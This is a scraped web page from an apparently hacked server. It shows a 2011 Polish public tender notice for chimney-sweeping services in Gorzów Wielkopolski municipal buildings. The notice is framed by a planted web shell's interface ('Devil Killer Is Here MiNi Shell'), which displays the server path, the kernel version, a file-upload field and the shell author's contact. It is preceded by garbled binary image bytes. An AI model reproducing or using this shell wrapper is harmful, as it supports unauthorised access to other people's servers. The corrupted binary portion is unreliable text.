JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110310/78487-N-2011.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1,3,4, 5.</b><br>
<b>Numer ogłoszenia: 78487 - 2011; data zamieszczenia: 10.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Wełniany Rynek 3, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7387101 (-02), faks 095 7387100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1,3,4, 5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w budynkach gminnych  administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1,3,4, 5. 
Zgodnie z dyspozycją  art. 61 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.), właściciel lub zarządca obiektu budowlanego jest obowiązany utrzymywać i użytkować obiekt zgodnie  z zasadami, o których mowa w art. 5 ust. 2  oraz art. 62 cytowanej wyżej ustawy. 
      Przedmiot zamówienia podzielony został na V zadań (rejonów).
Lp.	ADM	Zadanie 	Przewody
			S	D	W
1.	1	I	39	40	295
2.	1	II	4	11	77
3.	3	IV	50	131	146
4.	4	V	114	287	918
5.	5	VI	45	55	639

x	x	
x	                     252	524	 2 075
Objaśnienie :
D  - przewody dymowe
S  - przewody spalinowe
W - przewody wentylacyjne
W załączeniu wykazy budynków przypisanych każdemu z rejonów wg załączników  nr 1A - 1E do projektu umowy.  

USŁUGI  STAŁE
Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie a   w szczególności :
Do obowiązków  Wykonawcy  należy świadczenie :
1.  Usług kominiarskich stałych , które  obejmują :
 1.1. Czyszczenie przewodów kominowych, dymowych, spalinowych, wentylacyjnych, czopuchów, kanałów połączeniowych, itp.
        -  od palenisk opalanych paliwem stałym         - 4 razy w roku    
       -  od palenisk opalanych paliwem ciekłym lub gazowym   - 2 razy w roku    
       -  od przewodów wentylacyjnych       - 1  raz w roku  ,  jeżeli większa częstotliwość nie wynika z warunków użytkowych
Uwaga!  
Częstotliwość okresowego czyszczenia przewodów kominowych wynika z § 30 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006r w sprawie ochrony przeciwpożarowej budynków , innych obiektów i terenów ( Dz.U. Nr  80, poz. 563 )
 1.2. Usługa czyszczenia kanałów kominowych winna  być wykonana  przy pomocy :
  -    kompletu linowego ze szczotkami dopasowanymi do przekroju przewodów kominowych,
-przepychacza (gurówki) ze szczotkami dopasowanymi do przekroju przewodu kominowego.
1.3. Czyszczenie przewodów kominowych powinno  być zakończone wybraniem sadzy z przewodu kominowego  i wyniesieniem  jej z budynku. Wybieranie sadzy ze spadu  kominowego winno być wykonywane przy użyciu gracy do wybierania sadzy   i niepalnego worka kominiarskiego.
       Realizacja czynności wykazanych w pkt. 3.1. - usługi stałe, powinna przebiegać z częstotliwością wynikającą z cytowanych przepisów oraz w oparciu o opracowany przez Wykonawcę harmonogram czyszczeń i kontroli.
2. Ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny) obejmująca :
2.1. Sprawdzenie wykonania zaleceń wynikających z poprzedniej kontroli okresowej 
2.2. Sprawdzenie stanu technicznego elementów budynku objętych kontrolą ( w tym: 
-kominów ich przewodów, czopuchów, odgałęzień, głowic i nasad kominowych, drzwiczek wycierowych i rewizyjnych).   
2.3. Sprawdzenie prawidłowości funkcjonowania przewodów poprzez sprawdzenie ich drożności, prawidłowego ciągu kominowego, oraz prawidłowości podłączeń urządzeń (w tym wyposażenia we wkłady kominowe przewodów kominowych odprowadzających spaliny z urządzeń grzewczych gazowych- zgodnie z wymogami prawa ) i kratek wentylacyjnych do przewodów kominowych 
2.4. Sprawdzenie prawidłowości i stanu technicznego wyposażenia budynków to jest : 
włazy dachowe, ławy kominiarskie, drabiny itp. zapewniającego dogodny dostęp w celu wykonania  czynności stałej obsługi.
2.5. Sprawdzenie przestrzegania przepisów ppoż, w zakresie białkowania kominów i składowania na strychach materiałów  łatwopalnych. 
2.6. Występowania innych stwierdzonych w trakcie kontroli uszkodzeń i nieprawidłowości mogących spowodować zagrożenie bezpieczeństwa ludzi, uszkodzeń mienia.
2.7.  Sporządzenie protokołu pokontrolnego  wraz z uwzględnieniem wytycznych.
Roczna okresowa kontrola stanu technicznego sprawności przewodów kominowych i podłączeń w obsługiwanych budynkach (wartość za usługę nie może przekroczyć 50% wartości usług stałych).
3. Przeprowadzenie kontroli okresowej przewodów kominowych pod kątem przygotowania :
3.1. Sezonu grzewczego  kotłowni lokalnych. 
3.2.Sprawdzenie drożności, prawidłowego ciągu kominowego, prawidłowo działających wentylacji nawiewnej  i wywiewnej itp.
Komentarz :
Każdorazowo przed przystąpieniem  do wykonywania  czynności czyszczenia przewodów wentylacyjnych, Wykonawca winien  wywiesić w gablocie informacyjnej budynku informację o terminie  realizacji usługi.

3.3.Na okoliczność wykonania :
- przeglądu, winien być sporządzony protokół kontroli, zawierający w szczególności elementy wymienione w §  4 pkt,. 4 i 5 rozporządzenia Ministra Spraw wewnętrznych z dnia 16 sierpnia 1999r w sprawie warunków technicznych użytkowania budynków mieszkalnych ( Dz. U. z 1999 Nr 74, poz. 836 ze zm.)
Protokół z kontroli stanowił będzie  załącznik do książki obiektu budowlanego.
- czyszczeń przewodów kominowych,  winien być dokonany wpis do książki kominiarskiej.
Powyższe usługi kominiarskie wynikają z  art. 62 ust. 1 pkt. 1 lit. c z dnia 07.07.1994r. Prawo Budowlane. ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.)
Kontrolę stanu technicznego przewodów kominowych winny przeprowadzać osoby posiadające odpowiednie kwalifikacje, wynikające z postanowień art. 62 ust. 6  ustawy Prawo Budowlane. 

4.Sporządzanie opinii kominiarskich (mi.) pod potrzeby :
-    dokumentacji technicznej,
-    lokali remontowanych z ruchu ludności
-    projektów związanych z  wymianą instalacji gazowych
5. Inne usługi objęte zamówieniem 
1). Sprawdzenie stanu technicznego przewodów kominowych  i kanałów w stanie surowym, wykończeniowym i użytkowym w budynkach nowobudowanych, przebudowywanych i modernizowanych wraz z wydaniem pisemnych opinii kominiarskich 
2).Ustalenie przyczyny wadliwego działania urządzeń grzewczych odprowadzających spaliny z wydaniem ekspertyzy zawierającej wskazania rozwiązań technicznych 
3).Ustalenie przyczyny wadliwego działania  wentylacji  w lokalach, a w tym braku  prawidłowej cyrkulacji  powietrza wraz z wydaniem   ekspertyzy  zawierającej wskazania rozwiązań technicznych 
4). Przeprowadzenie inwentaryzacji urządzeń grzewczo-kominowych, w budynkach łącznie ze sporządzeniem niezbędnych  szkiców i rysunków oraz opisem stanu technicznego 
5). Odgruzowanie przewodu kominowego przy użyciu kamery inspekcyjnej 
6). Usuwanie gniazd ptasich 
7). Badania przewodu kominowego przy użyciu kamery inspekcyjnej                                                       
8). Wymiana lub osadzenie drzwiczek kominowych wraz z materiałami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, stanowiącego nie więcej niż 50% wartości zamówienia podstawowego. Ewentualne zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust. 1 pkt 6) ustawy Pzp, gdy zaistnieje uzasadniona potrzeba związana z powtórzeniem tego samego rodzaju zamówień;</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składanie ofert min. 2 usług w zakresie objętym przedmiotem zamówienia, z podaniem rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz oferty /zał. nr 1/  wraz z oświadczeniem, o :
-zdolności do wykonania zamówienia na podstawie art. 22 ust. 1 u Pzp, tym samym spełnieniu warunków określonych w siwz, 
-braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa  w art. 24 ust. 1 oraz art. 24 ust.2 pkt 1 u Pzp,
oraz że:
-zapoznaniu się z treścią załączonego wzoru umowy i jej akceptacji bez zastrzeżeń oraz zobowiązania się w przypadku wyboru, do jej zawarcia w miejscu i terminie wyznaczonym przez zamawiającego, 
2) Oryginał pełnomocnictwa osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy,o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień umowy w sytuacji zmiany istotnej tj.:
a)    ilości czyszczonych przewodów kominowych w trakcie trwania umowy, z przyczyn niezależnych od Zamawiającego, bez wpływu na zwiększenie ceny ofertowej
b)    osoby wymienionej w § 6 umowy 
-zmian postanowień umowy w sytuacji zmiany nieistotnej, tj:
        a)   uznanej za tożsamą, tzn. taką, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynie na krąg podmiotów ubiegających się o to zamówienie lub wynik postępowania( np. ustawowa zmiana stawki podatku VAT)
2. Modyfikacje i uzupełnienia  w treści niniejszej umowy będzie dokonywana wyłącznie w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm.bip.gorzow.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej
ul. Wełniany Rynek 3
66-400 Gorzów Wlkp.
pok.19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2011 godzina 10:00, miejsce: siedziba zamawiającego (sekretariat), pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I-ADM 1/Rewir I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w 17 budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej w rejonie ADM 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II-ADM 1/Rewir II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w 10 budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej w rejonie ADM 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III-ADM 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w 26 budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej w rejonie ADM 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV-ADM 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w 64 budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej w rejonie ADM 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V-ADM 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w 22 budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej w rejonie ADM 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.50.00.00-3, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com